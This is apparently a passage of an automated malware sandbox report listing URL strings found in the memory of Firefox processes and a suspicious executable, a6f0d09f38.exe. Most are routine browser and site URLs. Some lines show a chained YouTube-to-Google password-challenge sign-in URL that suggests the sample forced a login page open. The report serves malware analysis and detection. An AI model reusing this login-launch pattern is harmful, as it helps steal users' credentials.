Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://browser/content/parent/ext-devtools-pane
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2754238638.000001DEF7094000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/Trying
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB90C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 0000001C.00000002.3057404604.000001DEEC9BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2877108624.000001DEFA92E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001C.00000003.2920506033.000001DEF1243000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2888648124.000001DEFA2C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2924126002.000001DEF1117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=ht
Source: firefox.exe, 00000021.00000002.2954944692.000001729E530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 0000001F.00000002.2964244095.000001D14E950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig5
Source: firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challeng
Source: firefox.exe, 0000001C.00000003.2882299164.000001DEFA5CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2977094837.000001DEDE910000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2799655475.000001DEEF282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2799655475.000001DEEF2A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2835305075.000001DEEF2A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2835305075.000001DEEF282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2952085761.000001C8C3734000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964244095.000001D14E954000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E63A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2954944692.000001729E534000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.2977845893.000001DEDE990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd$
Source: firefox.exe, 0000001A.00000002.2709595092.000001D3FB20A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2715806075.0000021131BA7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2977845893.000001DEDE990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
